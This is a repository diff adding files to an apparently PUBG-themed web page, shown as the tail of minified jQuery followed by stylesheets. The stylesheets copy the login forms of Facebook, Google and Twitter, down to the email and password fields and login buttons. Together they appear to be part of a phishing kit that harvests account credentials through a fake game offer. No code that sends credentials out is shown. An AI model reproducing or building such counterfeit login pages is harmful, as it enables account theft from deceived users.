0!==b[c]&&((e[c]?a:d||(d={}))[c]=b[c]);return d&&n.extend(!0,a,d),a}function tc(a,b,c){var d,e,f,g,h=a.contents,i=a.dataTypes;while("*"===i[0])i.shift(),void 0===d&&(d=a.mimeType||b.getResponseHeader("Content-Type"));if(d)for(e in h)if(h[e]&&h[e].test(d)){i.unshift(e);break}if(i[0]in c)f=i[0];else{for(e in c){if(!i[0]||a.converters[e+" "+i[0]]){f=e;break}g||(g=e)}f=f||g}return f?(f!==i[0]&&i.unshift(f),c[f]):void 0}function uc(a,b,c,d){var e,f,g,h,i,j={},k=a.dataTypes.slice();if(k[1])for(g in a.converters)j[g.toLowerCase()]=a.converters[g];f=k.shift();while(f)if(a.responseFields[f]&&(c[a.responseFields[f]]=b),!i&&d&&a.dataFilter&&(b=a.dataFilter(b,a.dataType)),i=f,f=k.shift())if("*"===f)f=i;else if("*"!==i&&i!==f){if(g=j[i+" "+f]||j["* "+f],!g)for(e in j)if(h=e.split(" "),h[1]===f&&(g=j[i+" "+h[0]]||j["* "+h[0]])){g===!0?g=j[e]:j[e]!==!0&&(f=h[0],k.unshift(h[1]));break}if(g!==!0)if(g&&a["throws"])b=g(b);else try{b=g(b)}catch(l){return{state:"parsererror",error:g?l:"No conversion from "+i+" to "+f}}}return{state:"success",data:b}}n.extend({active:0,lastModified:{},etag:{},ajaxSettings:{url:oc,type:"GET",isLocal:hc.test(pc[1]),global:!0,processData:!0,async:!0,contentType:"application/x-www-form-urlencoded; charset=UTF-8",accepts:{"*":nc,text:"text/plain",html:"text/html",xml:"application/xml, text/xml",json:"application/json, text/javascript"},contents:{xml:/xml/,html:/html/,json:/json/},responseFields:{xml:"responseXML",text:"responseText",json:"responseJSON"},converters:{"* text":String,"text html":!0,"text json":n.parseJSON,"text xml":n.parseXML},flatOptions:{url:!0,context:!0}},ajaxSetup:function(a,b){return b?sc(sc(a,n.ajaxSettings),b):sc(n.ajaxSettings,a)},ajaxPrefilter:qc(lc),ajaxTransport:qc(mc),ajax:function(a,b){"object"==typeof a&&(b=a,a=void 0),b=b||{};var c,d,e,f,g,h,i,j,k=n.ajaxSetup({},b),l=k.context||k,m=k.context&&(l.nodeType||l.jquery)?n(l):n.event,o=n.Deferred(),p=n.Callbacks("once memory"),q=k.statusCode||{},r={},s={},t=0,u="canceled",v={readyState:0,getResponseHeader:function(a){var b;if(2===t){if(!f){f={};while(b=gc.exec(e))f[b[1].toLowerCase()]=b[2]}b=f[a.toLowerCase()]}return null==b?null:b},getAllResponseHeaders:function(){return 2===t?e:null},setRequestHeader:function(a,b){var c=a.toLowerCase();return t||(a=s[c]=s[c]||a,r[a]=b),this},overrideMimeType:function(a){return t||(k.mimeType=a),this},statusCode:function(a){var b;if(a)if(2>t)for(b in a)q[b]=[q[b],a[b]];else v.always(a[v.status]);return this},abort:function(a){var b=a||u;return c&&c.abort(b),x(0,b),this}};if(o.promise(v).complete=p.add,v.success=v.done,v.error=v.fail,k.url=((a||k.url||oc)+"").replace(ec,"").replace(jc,pc[1]+"//"),k.type=b.method||b.type||k.method||k.type,k.dataTypes=n.trim(k.dataType||"*").toLowerCase().match(E)||[""],null==k.crossDomain&&(h=kc.exec(k.url.toLowerCase()),k.crossDomain=!(!h||h[1]===pc[1]&&h[2]===pc[2]&&(h[3]||("http:"===h[1]?"80":"443"))===(pc[3]||("http:"===pc[1]?"80":"443")))),k.data&&k.processData&&"string"!=typeof k.data&&(k.data=n.param(k.data,k.traditional)),rc(lc,k,b,v),2===t)return v;i=n.event&&k.global,i&&0===n.active++&&n.event.trigger("ajaxStart"),k.type=k.type.toUpperCase(),k.hasContent=!ic.test(k.type),d=k.url,k.hasContent||(k.data&&(d=k.url+=(dc.test(d)?"&":"?")+k.data,delete k.data),k.cache===!1&&(k.url=fc.test(d)?d.replace(fc,"$1_="+cc++):d+(dc.test(d)?"&":"?")+"_="+cc++)),k.ifModified&&(n.lastModified[d]&&v.setRequestHeader("If-Modified-Since",n.lastModified[d]),n.etag[d]&&v.setRequestHeader("If-None-Match",n.etag[d])),(k.data&&k.hasContent&&k.contentType!==!1||b.contentType)&&v.setRequestHeader("Content-Type",k.contentType),v.setRequestHeader("Accept",k.dataTypes[0]&&k.accepts[k.dataTypes[0]]?k.accepts[k.dataTypes[0]]+("*"!==k.dataTypes[0]?", "+nc+"; q=0.01":""):k.accepts["*"]);for(j in k.headers)v.setRequestHeader(j,k.headers[j]);if(k.beforeSend&&(k.beforeSend.call(l,v,k)===!1||2===t))return v.abort();u="abort";for(j in{success:1,error:1,complete:1})v[j](k[j]);if(c=rc(mc,k,b,v)){v.readyState=1,i&&m.trigger("ajaxSend",[v,k]),k.async&&k.timeout>0&&(g=setTimeout(function(){v.abort("timeout")},k.timeout));try{t=1,c.send(r,x)}catch(w){if(!(2>t))throw w;x(-1,w)}}else x(-1,"No Transport");function x(a,b,f,h){var j,r,s,u,w,x=b;2!==t&&(t=2,g&&clearTimeout(g),c=void 0,e=h||"",v.readyState=a>0?4:0,j=a>=200&&300>a||304===a,f&&(u=tc(k,v,f)),u=uc(k,u,v,j),j?(k.ifModified&&(w=v.getResponseHeader("Last-Modified"),w&&(n.lastModified[d]=w),w=v.getResponseHeader("etag"),w&&(n.etag[d]=w)),204===a||"HEAD"===k.type?x="nocontent":304===a?x="notmodified":(x=u.state,r=u.data,s=u.error,j=!s)):(s=x,(a||!x)&&(x="error",0>a&&(a=0))),v.status=a,v.statusText=(b||x)+"",j?o.resolveWith(l,[r,x,v]):o.rejectWith(l,[v,x,s]),v.statusCode(q),q=void 0,i&&m.trigger(j?"ajaxSuccess":"ajaxError",[v,k,j?r:s]),p.fireWith(l,[v,x]),i&&(m.trigger("ajaxComplete",[v,k]),--n.active||n.event.trigger("ajaxStop")))}return v},getJSON:function(a,b,c){return n.get(a,b,c,"json")},getScript:function(a,b){return n.get(a,void 0,b,"script")}}),n.each(["get","post"],function(a,b){n[b]=function(a,c,d,e){return n.isFunction(c)&&(e=e||d,d=c,c=void 0),n.ajax({url:a,type:b,dataType:e,data:c,success:d})}}),n._evalUrl=function(a){return n.ajax({url:a,type:"GET",dataType:"script",async:!1,global:!1,"throws":!0})},n.fn.extend({wrapAll:function(a){var b;return n.isFunction(a)?this.each(function(b){n(this).wrapAll(a.call(this,b))}):(this[0]&&(b=n(a,this[0].ownerDocument).eq(0).clone(!0),this[0].parentNode&&b.insertBefore(this[0]),b.map(function(){var a=this;while(a.firstElementChild)a=a.firstElementChild;return a}).append(this)),this)},wrapInner:function(a){return this.each(n.isFunction(a)?function(b){n(this).wrapInner(a.call(this,b))}:function(){var b=n(this),c=b.contents();c.length?c.wrapAll(a):b.append(a)})},wrap:function(a){var b=n.isFunction(a);return this.each(function(c){n(this).wrapAll(b?a.call(this,c):a)})},unwrap:function(){return this.parent().each(function(){n.nodeName(this,"body")||n(this).replaceWith(this.childNodes)}).end()}}),n.expr.filters.hidden=function(a){return a.offsetWidth<=0&&a.offsetHeight<=0},n.expr.filters.visible=function(a){return!n.expr.filters.hidden(a)};var vc=/%20/g,wc=/\[\]$/,xc=/\r?\n/g,yc=/^(?:submit|button|image|reset|file)$/i,zc=/^(?:input|select|textarea|keygen)/i;function Ac(a,b,c,d){var e;if(n.isArray(b))n.each(b,function(b,e){c||wc.test(a)?d(a,e):Ac(a+"["+("object"==typeof e?b:"")+"]",e,c,d)});else if(c||"object"!==n.type(b))d(a,b);else for(e in b)Ac(a+"["+e+"]",b[e],c,d)}n.param=function(a,b){var c,d=[],e=function(a,b){b=n.isFunction(b)?b():null==b?"":b,d[d.length]=encodeURIComponent(a)+"="+encodeURIComponent(b)};if(void 0===b&&(b=n.ajaxSettings&&n.ajaxSettings.traditional),n.isArray(a)||a.jquery&&!n.isPlainObject(a))n.each(a,function(){e(this.name,this.value)});else for(c in a)Ac(c,a[c],b,e);return d.join("&").replace(vc,"+")},n.fn.extend({serialize:function(){return n.param(this.serializeArray())},serializeArray:function(){return this.map(function(){var a=n.prop(this,"elements");return a?n.makeArray(a):this}).filter(function(){var a=this.type;return this.name&&!n(this).is(":disabled")&&zc.test(this.nodeName)&&!yc.test(a)&&(this.checked||!T.test(a))}).map(function(a,b){var c=n(this).val();return null==c?null:n.isArray(c)?n.map(c,function(a){return{name:b.name,value:a.replace(xc,"\r\n")}}):{name:b.name,value:c.replace(xc,"\r\n")}}).get()}}),n.ajaxSettings.xhr=function(){try{return new XMLHttpRequest}catch(a){}};var Bc=0,Cc={},Dc={0:200,1223:204},Ec=n.ajaxSettings.xhr();a.attachEvent&&a.attachEvent("onunload",function(){for(var a in Cc)Cc[a]()}),k.cors=!!Ec&&"withCredentials"in Ec,k.ajax=Ec=!!Ec,n.ajaxTransport(function(a){var b;return k.cors||Ec&&!a.crossDomain?{send:function(c,d){var e,f=a.xhr(),g=++Bc;if(f.open(a.type,a.url,a.async,a.username,a.password),a.xhrFields)for(e in a.xhrFields)f[e]=a.xhrFields[e];a.mimeType&&f.overrideMimeType&&f.overrideMimeType(a.mimeType),a.crossDomain||c["X-Requested-With"]||(c["X-Requested-With"]="XMLHttpRequest");for(e in c)f.setRequestHeader(e,c[e]);b=function(a){return function(){b&&(delete Cc[g],b=f.onload=f.onerror=null,"abort"===a?f.abort():"error"===a?d(f.status,f.statusText):d(Dc[f.status]||f.status,f.statusText,"string"==typeof f.responseText?{text:f.responseText}:void 0,f.getAllResponseHeaders()))}},f.onload=b(),f.onerror=b("error"),b=Cc[g]=b("abort");try{f.send(a.hasContent&&a.data||null)}catch(h){if(b)throw h}},abort:function(){b&&b()}}:void 0}),n.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/(?:java|ecma)script/},converters:{"text script":function(a){return n.globalEval(a),a}}}),n.ajaxPrefilter("script",function(a){void 0===a.cache&&(a.cache=!1),a.crossDomain&&(a.type="GET")}),n.ajaxTransport("script",function(a){if(a.crossDomain){var b,c;return{send:function(d,e){b=n("<script>").prop({async:!0,charset:a.scriptCharset,src:a.url}).on("load error",c=function(a){b.remove(),c=null,a&&e("error"===a.type?404:200,a.type)}),l.head.appendChild(b[0])},abort:function(){c&&c()}}}});var Fc=[],Gc=/(=)\?(?=&|$)|\?\?/;n.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var a=Fc.pop()||n.expando+"_"+cc++;return this[a]=!0,a}}),n.ajaxPrefilter("json jsonp",function(b,c,d){var e,f,g,h=b.jsonp!==!1&&(Gc.test(b.url)?"url":"string"==typeof b.data&&!(b.contentType||"").indexOf("application/x-www-form-urlencoded")&&Gc.test(b.data)&&"data");return h||"jsonp"===b.dataTypes[0]?(e=b.jsonpCallback=n.isFunction(b.jsonpCallback)?b.jsonpCallback():b.jsonpCallback,h?b[h]=b[h].replace(Gc,"$1"+e):b.jsonp!==!1&&(b.url+=(dc.test(b.url)?"&":"?")+b.jsonp+"="+e),b.converters["script json"]=function(){return g||n.error(e+" was not called"),g[0]},b.dataTypes[0]="json",f=a[e],a[e]=function(){g=arguments},d.always(function(){a[e]=f,b[e]&&(b.jsonpCallback=c.jsonpCallback,Fc.push(e)),g&&n.isFunction(f)&&f(g[0]),g=f=void 0}),"script"):void 0}),n.parseHTML=function(a,b,c){if(!a||"string"!=typeof a)return null;"boolean"==typeof b&&(c=b,b=!1),b=b||l;var d=v.exec(a),e=!c&&[];return d?[b.createElement(d[1])]:(d=n.buildFragment([a],b,e),e&&e.length&&n(e).remove(),n.merge([],d.childNodes))};var Hc=n.fn.load;n.fn.load=function(a,b,c){if("string"!=typeof a&&Hc)return Hc.apply(this,arguments);var d,e,f,g=this,h=a.indexOf(" ");return h>=0&&(d=n.trim(a.slice(h)),a=a.slice(0,h)),n.isFunction(b)?(c=b,b=void 0):b&&"object"==typeof b&&(e="POST"),g.length>0&&n.ajax({url:a,type:e,dataType:"html",data:b}).done(function(a){f=arguments,g.html(d?n("<div>").append(n.parseHTML(a)).find(d):a)}).complete(c&&function(a,b){g.each(c,f||[a.responseText,b,a])}),this},n.each(["ajaxStart","ajaxStop","ajaxComplete","ajaxError","ajaxSuccess","ajaxSend"],function(a,b){n.fn[b]=function(a){return this.on(b,a)}}),n.expr.filters.animated=function(a){return n.grep(n.timers,function(b){return a===b.elem}).length};var Ic=a.document.documentElement;function Jc(a){return n.isWindow(a)?a:9===a.nodeType&&a.defaultView}n.offset={setOffset:function(a,b,c){var d,e,f,g,h,i,j,k=n.css(a,"position"),l=n(a),m={};"static"===k&&(a.style.position="relative"),h=l.offset(),f=n.css(a,"top"),i=n.css(a,"left"),j=("absolute"===k||"fixed"===k)&&(f+i).indexOf("auto")>-1,j?(d=l.position(),g=d.top,e=d.left):(g=parseFloat(f)||0,e=parseFloat(i)||0),n.isFunction(b)&&(b=b.call(a,c,h)),null!=b.top&&(m.top=b.top-h.top+g),null!=b.left&&(m.left=b.left-h.left+e),"using"in b?b.using.call(a,m):l.css(m)}},n.fn.extend({offset:function(a){if(arguments.length)return void 0===a?this:this.each(function(b){n.offset.setOffset(this,a,b)});var b,c,d=this[0],e={top:0,left:0},f=d&&d.ownerDocument;if(f)return b=f.documentElement,n.contains(b,d)?(typeof d.getBoundingClientRect!==U&&(e=d.getBoundingClientRect()),c=Jc(f),{top:e.top+c.pageYOffset-b.clientTop,left:e.left+c.pageXOffset-b.clientLeft}):e},position:function(){if(this[0]){var a,b,c=this[0],d={top:0,left:0};return"fixed"===n.css(c,"position")?b=c.getBoundingClientRect():(a=this.offsetParent(),b=this.offset(),n.nodeName(a[0],"html")||(d=a.offset()),d.top+=n.css(a[0],"borderTopWidth",!0),d.left+=n.css(a[0],"borderLeftWidth",!0)),{top:b.top-d.top-n.css(c,"marginTop",!0),left:b.left-d.left-n.css(c,"marginLeft",!0)}}},offsetParent:function(){return this.map(function(){var a=this.offsetParent||Ic;while(a&&!n.nodeName(a,"html")&&"static"===n.css(a,"position"))a=a.offsetParent;return a||Ic})}}),n.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(b,c){var d="pageYOffset"===c;n.fn[b]=function(e){return J(this,function(b,e,f){var g=Jc(b);return void 0===f?g?g[c]:b[e]:void(g?g.scrollTo(d?a.pageXOffset:f,d?f:a.pageYOffset):b[e]=f)},b,e,arguments.length,null)}}),n.each(["top","left"],function(a,b){n.cssHooks[b]=yb(k.pixelPosition,function(a,c){return c?(c=xb(a,b),vb.test(c)?n(a).position()[b]+"px":c):void 0})}),n.each({Height:"height",Width:"width"},function(a,b){n.each({padding:"inner"+a,content:b,"":"outer"+a},function(c,d){n.fn[d]=function(d,e){var f=arguments.length&&(c||"boolean"!=typeof d),g=c||(d===!0||e===!0?"margin":"border");return J(this,function(b,c,d){var e;return n.isWindow(b)?b.document.documentElement["client"+a]:9===b.nodeType?(e=b.documentElement,Math.max(b.body["scroll"+a],e["scroll"+a],b.body["offset"+a],e["offset"+a],e["client"+a])):void 0===d?n.css(b,c,g):n.style(b,c,d,g)},b,f?d:void 0,f,null)}})}),n.fn.size=function(){return this.length},n.fn.andSelf=n.fn.addBack,"function"==typeof define&&define.amd&&define("jquery",[],function(){return n});var Kc=a.jQuery,Lc=a.$;return n.noConflict=function(b){return a.$===n&&(a.$=Lc),b&&a.jQuery===n&&(a.jQuery=Kc),n},typeof b===U&&(a.jQuery=a.$=n),n});
     5 + 
  • pubg/notp/ajax/libs/material-design-iconic-font/2-2-0/css/material-design-iconic-font.css
    Diff is too large to be displayed.
  • pubg/notp/ajax/libs/material-design-iconic-font/2-2-0/fonts/material-design-iconic-font.ttf
    Binary file.
  • pubg/notp/ajax/libs/material-design-iconic-font/2-2-0/fonts/material-design-iconic-font.woff
    Binary file.
  • pubg/notp/css/animate.css
    Diff is too large to be displayed.
  • ■ ■ ■ ■ ■ ■
    pubg/notp/css/login/facebook.css
     1 +.navbar-fb {
     2 + background: #3b5998;
     3 + width: 100%;
     4 + height: auto;
     5 + padding: 8px;
     6 + border-top-left-radius: 10px;
     7 + border-top-right-radius: 10px;
     8 +}
     9 +.navbar-fb img {
     10 + width: 115;
     11 + margin-left: auto;
     12 + margin-right: auto;
     13 + display: block;
     14 +}
     15 +.content-box-fb {
     16 + width: 300px;
     17 + height: auto;
     18 + margin-left: auto;
     19 + margin-right: auto;
     20 + display: block;
     21 +}
     22 +.content-box-fb img {
     23 + width: 60;
     24 + margin-top: 20px;
     25 + margin-left: auto;
     26 + margin-right: auto;
     27 + border-radius: 12px;
     28 + display: block;
     29 +}
     30 +.txt-login-fb {
     31 + width: 270px;
     32 + height: auto;
     33 + margin-top: 10px;
     34 + margin-left: auto;
     35 + margin-right: auto;
     36 + margin-bottom: 17px;
     37 + padding: 8px;
     38 + color: #90949c;
     39 + font-size: 16px;
     40 + font-family: 'Lato',sans-serif;
     41 + text-align: center;
     42 + display: block;
     43 +}
     44 +.input-fb-email {
     45 + width: 100%;
     46 + height: auto;
     47 + padding: 12px;
     48 + color: #000;
     49 + font-size: 14px;
     50 + font-weight: 400;
     51 + font-family: 'Lato',sans-serif;
     52 + border: 1px solid #bdbebf;
     53 + border-bottom: 0px;
     54 + border-top-left-radius: 5px;
     55 + border-top-right-radius: 5px;
     56 + cursor: pointer;
     57 + outline: none;
     58 +}
     59 +.input-fb-password {
     60 + width: 100%;
     61 + height: auto;
     62 + padding: 12px;
     63 + color: #000;
     64 + font-size: 14px;
     65 + font-weight: 400;
     66 + font-family: 'Lato',sans-serif;
     67 + border: 1px solid #bdbebf;
     68 + border-bottom-left-radius: 5px;
     69 + border-bottom-right-radius: 5px;
     70 + cursor: pointer;
     71 + outline: none;
     72 +}
     73 +.btn-login-fb {
     74 + background: #1778f2;
     75 + width: 100%;
     76 + height: auto;
     77 + margin-top: 10px;
     78 + margin-left: auto;
     79 + margin-right: auto;
     80 + padding: 10px;
     81 + color: #fff;
     82 + font-size: 14px;
     83 + font-family: 'Lato',sans-serif;
     84 + font-weight: bold;
     85 + text-align: center;
     86 + text-shadow: 1px 0px rgba(0, 0, 0, 0.3);
     87 + border: 1px solid #3578e5;
     88 + border-radius: 5px;
     89 + box-shadow: 1px 1px 1px 1px rgba(0, 0, 0, 0.1);
     90 + outline: none;
     91 + display: block;
     92 +}
     93 +.txt-create-account {
     94 + width: 100%;
     95 + height: auto;
     96 + padding: 5px;
     97 + color: #3b5998;
     98 + font-size: 13.5px;
     99 + font-family: 'Lato',sans-serif;
     100 + text-align: center;
     101 +}
     102 +.txt-not-now {
     103 + width: 100%;
     104 + height: auto;
     105 + padding: 5px;
     106 + color: #3b5998;
     107 + font-size: 13.5px;
     108 + font-family: 'Lato',sans-serif;
     109 + text-align: center;
     110 +}
     111 +.txt-forgotten-password {
     112 + width: 100%;
     113 + height: auto;
     114 + margin-bottom: 30px;
     115 + padding: 5px;
     116 + color: #7596c8;
     117 + font-size: 13.5px;
     118 + font-family: 'Lato',sans-serif;
     119 + text-align: center;
     120 +}
     121 +.language-box {
     122 + width: 100%;
     123 + height: auto;
     124 + margin-left: auto;
     125 + margin-right: auto;
     126 + display: block;
     127 +}
     128 +.language-name {
     129 + width: 40%;
     130 + height: auto;
     131 + margin: 5px;
     132 + margin-bottom: 0px;
     133 + color: #3b5998;
     134 + font-size: 12px;
     135 + font-family: 'Lato',sans-serif;
     136 + text-align: center;
     137 + display: inline-block;
     138 +}
     139 +.language-name i {
     140 + width: 23px;
     141 + padding: 4px;
     142 + color: #90949c;
     143 + border: 1px solid #3b5998;
     144 + border-radius: 3px;
     145 +}
     146 +.language-name-active {
     147 + color: #90949c;
     148 + font-weight: bold;
     149 +}
     150 +.copyright {
     151 + width: 40%;
     152 + height: auto;
     153 + margin-top: 10px;
     154 + margin-left: auto;
     155 + margin-right: auto;
     156 + color: #90949c;
     157 + font-size: 12px;
     158 + font-family: 'Lato',sans-serif;
     159 + text-align: center;
     160 + display: block;
     161 +}
  • ■ ■ ■ ■ ■ ■
    pubg/notp/css/login/google.css
     1 +@font-face {
     2 + font-family:'google';
     3 + src:url('../../fonts/google.ttf')
     4 +}
     5 +.header-google {
     6 + background: #fff;
     7 + width: 100%;
     8 + position: relative;
     9 + margin-bottom: 10px;
     10 + border-radius: 10px;
     11 +}
     12 +.header-google img {
     13 + width: 78;
     14 +}
     15 +.txt-login-google {
     16 + color: #000;
     17 + font-size: 24px;
     18 + font-family:'google',arial,sans-serif;
     19 + text-align: center;
     20 +}
     21 +.txt-login-google-desc {
     22 + font-size: 15px;
     23 + font-family: Arial, sans-serif;
     24 + text-align: center;
     25 + padding-top: 13px;
     26 +}
     27 +.txt-login-google-password {
     28 + margin-bottom: 7px;
     29 + color: #000;
     30 + font-size: 24px;
     31 + font-family:'google',arial,sans-serif;
     32 + text-align: center;
     33 +}
     34 +span.user {
     35 + width: auto;
     36 + height: auto;
     37 + padding-top: 1px;
     38 + padding-left: 5px;
     39 + padding-right: 5px;
     40 + padding-bottom: 4px;
     41 + color: #000;
     42 + font-size: 15px;
     43 + font-family: 'google';
     44 + text-align: center;
     45 + border: 1px solid #000;
     46 + border-radius: 50px;
     47 +}
     48 +span.user i {
     49 + color: #000;
     50 +}
     51 +.google-input-email {
     52 + width: 100%;
     53 + height: 50px;
     54 + margin-top: 10%;
     55 + position:relative;
     56 +}
     57 +.google-input-email input {
     58 + width: 100%;
     59 + height: 55px;
     60 + padding: 15px;
     61 + padding-top: 0;
     62 + padding-bottom: 0;
     63 + color: #000;
     64 + font-size: 15px;
     65 + font-family: Arial, sans-serif;
     66 + border: 1px solid #dadce0;
     67 + border-radius: 4px;
     68 +}
     69 +.google-input-email label {
     70 + position: absolute;
     71 + padding: 13px;
     72 + color:#888;
     73 + font-size: 16px;
     74 + font-family: Arial, sans-serif;
     75 + text-align: left;
     76 + transform:translateY(4px);
     77 + transition:all 0.2s ease-in-out;
     78 + left: 0;
     79 +}
     80 +.google-input-email input:valid,.google-input-email input:focus {
     81 + border: 2px solid #1a73e8;
     82 + outline: none;
     83 +}
     84 +.google-input-email input:valid+label,.google-input-email input:focus+label {
     85 + background: #fff;
     86 + color: #1a73e8;
     87 + font-size: 20px;
     88 + margin-left: 4px;
     89 + padding: 10px;
     90 + transform:scale(.60) translateY(-38px) translateX(-40px);
     91 + border-radius: 5px;
     92 +}
     93 +.google-input-password {
     94 + width: 100%;
     95 + height: 50px;
     96 + margin-top: 10%;
     97 + position:relative;
     98 +}
     99 +.google-input-password input {
     100 + width: 100%;
     101 + height: 55px;
     102 + padding: 15px;
     103 + padding-top: 0;
     104 + padding-bottom: 0;
     105 + color: #000;
     106 + font-size: 15px;
     107 + font-family: Arial, sans-serif;
     108 + border: 1px solid #dadce0;
     109 + border-radius: 4px;
     110 +}
     111 +.google-input-password label {
     112 + position: absolute;
     113 + padding: 13px;
     114 + color:#888;
     115 + font-size: 16px;
     116 + font-family: Arial, sans-serif;
     117 + text-align: left;
     118 + transform:translateY(4px);
     119 + transition:all 0.2s ease-in-out;
     120 + left: 0;
     121 +}
     122 +.google-input-password i {
     123 + background: none;
     124 + width: 10%;
     125 + height: auto;
     126 + padding: 5px;
     127 + color: gray;
     128 + font-size: 25px;
     129 + border: none;
     130 + position: absolute;
     131 + margin-left: 88%;
     132 + margin-top: 3%;
     133 +}
     134 +.google-input-password input:valid,.google-input-password input:focus {
     135 + border: 2px solid #1a73e8;
     136 + outline: none;
     137 +}
     138 +.google-input-password input:valid+label,.google-input-password input:focus+label {
     139 + background: #fff;
     140 + color: #1a73e8;
     141 + font-size: 19px;
     142 + margin-left: 4px;
     143 + padding: 10px;
     144 + transform:scale(.67) translateY(-30px) translateX(-40px);
     145 + border-radius: 5px;
     146 +}
     147 +.btn-forgot-google {
     148 + background: #fff;
     149 + width: auto;
     150 + height: auto;
     151 + margin: 0px;
     152 + padding: 10px;
     153 + padding-left: 0;
     154 + color: #1a73e8;
     155 + font-size: 14.5px;
     156 + font-family:'google',arial,sans-serif;
     157 + letter-spacing:.25px;
     158 + text-align: left;
     159 + border: none;
     160 + outline: none;
     161 + float: left;
     162 +}
     163 +.notify-google {
     164 + width: 100%;
     165 + height: auto;
     166 + color: gray;
     167 + font-size: 14px;
     168 + font-family: arial,sans-serif;
     169 + text-align: left;
     170 + margin-top: 10%;
     171 + margin-bottom: 5%;
     172 +}
     173 +.notify-google span {
     174 + color: #1a73e8;
     175 + font-weight: inherit;
     176 +}
     177 +.btn-login-google {
     178 + background: #1a73e8;
     179 + width: 30%;
     180 + height: auto;
     181 + margin: 0px;
     182 + padding: 10px;
     183 + color: #fff;
     184 + font-size: 14px;
     185 + font-family:'google',arial,sans-serif;
     186 + letter-spacing:.25px;
     187 + text-align: center;
     188 + border: none;
     189 + border-radius: 5px;
     190 + outline: none;
     191 + float: right;
     192 +}
     193 +@media only screen and (max-width:600px) {
     194 + .google-container {
     195 + width: 100%;
     196 + height: 100%;
     197 + margin-top: 0px;
     198 + margin-bottom: 0px;
     199 + border: none;
     200 + }
     201 + .header-google {
     202 + border-top-left-radius: 0px;
     203 + border-top-right-radius: 0px;
     204 + }
     205 + .footer-language-google, .footer-menu-google {
     206 + margin-top: 70%;
     207 + }
     208 + .footer-language-account-google, .footer-menu-account-google {
     209 + margin-top: 90%;
     210 + }
     211 +}
  • ■ ■ ■ ■ ■ ■
    pubg/notp/css/login/twitter.css
     1 +.header-twitter {
     2 + background: #fff;
     3 + width: 100%;
     4 + font-size: 25px;
     5 + font-weight: bold;
     6 + text-align: left;
     7 + position: relative;
     8 + border-radius: 10px;
     9 +}
     10 +.header-twitter img {
     11 + width: 55;
     12 +}
     13 +.box-twitter {
     14 + width: 100%;
     15 + height: 400px;
     16 + position: absolute;
     17 + overflow: none;
     18 + font-size: 15px;
     19 + font-family: sans-serif;
     20 + border-radius: 10px;
     21 +}
     22 +.txt-login-twitter {
     23 + color: #000;
     24 + font-size: 20px;
     25 + font-weight: bold;
     26 + font-family: arial, sans-serif;
     27 + margin-top: 3%;
     28 + margin-bottom: 5%;
     29 +}
     30 +.input-box-twitter {
     31 + background: #f5f8fa;
     32 + width: 90%;
     33 + height: 55px;
     34 + margin-top: 10px;
     35 + margin-bottom: 18px;
     36 + padding: 10px;
     37 + padding-top: 5px;
     38 + font-size: 14px;
     39 + font-family: arial, sans-serif;
     40 + text-align: left;
     41 + position: relative;
     42 + border-bottom: 2px solid #657786;
     43 + border-radius: 2px;
     44 + outline: none;
     45 + z-index: 2;
     46 +}
     47 +.input-box-twitter label {
     48 + color: #657786;
     49 + text-align: left;
     50 +}
     51 +.input-box-twitter input {
     52 + background: transparent;
     53 + width: 100%;
     54 + height: auto;
     55 + padding: 7px;
     56 + padding-top: 3px;
     57 + padding-left: 0px;
     58 + color: #000;
     59 + font-size: 18px;
     60 + font-family: arial, sans-serif;
     61 + text-align: left;
     62 + position: relative;
     63 + border: none;
     64 + outline: none;
     65 + z-index: 2;
     66 +}
     67 +.btn-login-twitter {
     68 + background: #1da1f2;
     69 + width: 90%;
     70 + height: auto;
     71 + padding: 14px;
     72 + color: #fff;
     73 + font-size: 15px;
     74 + font-weight: bold;
     75 + font-family: arial, sans-serif;
     76 + border: none;
     77 + border-radius: 30px;
     78 + outline: none;
     79 + letter-spacing: 1;
     80 +}
     81 +.footer-menu-twitter {
     82 + width: auto;
     83 + height: auto;
     84 + margin: 0.5%;
     85 + margin-top: 7%;
     86 + color: #1da1f2;
     87 + font-size: 14px;
     88 + font-family: arial, sans-serif;
     89 + display: inline-block;
     90 +}
     91 +.bulet {
     92 + color: #000;
     93 + font-size: 8px;
     94 +}
     95 +.aktifnya {
     96 + color: #1da1f2;
     97 + border-bottom: 2px solid #1da1f2;
     98 +}
  • ■ ■ ■ ■ ■ ■
    pubg/notp/css/style.css
     1 +@charset "utf-8";
     2 +@import url("https://fonts.googleapis.com/css2?family=Teko&display=swap");
     3 +*,*:before,*:after {
     4 + -webkit-box-sizing:border-box;
     5 + -moz-box-sizing:border-box;
     6 + box-sizing:border-box;
     7 +}
     8 +body {
     9 + background:#fff;
     10 + -webkit-background-size:cover;
     11 + -moz-background-size:cover;
     12 + -o-background-size:cover;
     13 + background-size:cover;
     14 + margin:0;
     15 + color:#000;
     16 + font-family:'Teko',sans-serif;
     17 +}
     18 +.container {
     19 + background:url(../img/container.jpg) no-repeat center;
     20 + background-size:cover;
     21 + margin:0px auto;
     22 + margin-top:0.5%;
     23 + margin-bottom:0.5%;
     24 + max-width:400px;
     25 + height:640px;
     26 + border: 1px solid #ffcc57;
     27 + border-radius:10px;
     28 + box-shadow:1px 1px 10px rgba(0,0,0,0.3);
     29 + position:relative;
     30 +}
     31 +.container-mask {
     32 + background: rgba(0, 0, 0, 0.5);
     33 + width: 100%;
     34 + height: 100%;
     35 + border-radius: 10px;
     36 +}
     37 +.navbar {
     38 + background: #000;
     39 + width:100%;
     40 + height:50px;
     41 + border-bottom:1px solid #eaa300;
     42 + border-top-left-radius:10px;
     43 + border-top-right-radius:10px;
     44 +}
     45 +.navbar-logo-box {
     46 + width: 150px;
     47 + height: 100%;
     48 + border-top-left-radius: 8px;
     49 + border-bottom: 50px solid #eaa300;
     50 + border-right: 50px solid transparent;
     51 +}
     52 +.navbar-logo-box img {
     53 + width: 100px;
     54 + padding-top: 5px;
     55 + margin-left: 8px;
     56 +}
     57 +.navbar-menu {
     58 + margin-top:4px;
     59 + float:right;
     60 +}
     61 +.navbar-menu i {
     62 + margin-top: 3px;
     63 + margin-right: 10px;
     64 + color: #eaa300;
     65 + font-size: 35px;
     66 +}
     67 +.landing-content {
     68 + width: 100%;
     69 + height: 350px;
     70 +}
     71 +.btn-share {
     72 + background: #eaa300;
     73 + width: 25%;
     74 + height: 33px;
     75 + margin-top: 11px;
     76 + margin-left: 9px;
     77 + padding: 5px;
     78 + border: 1px solid #ffcc57;
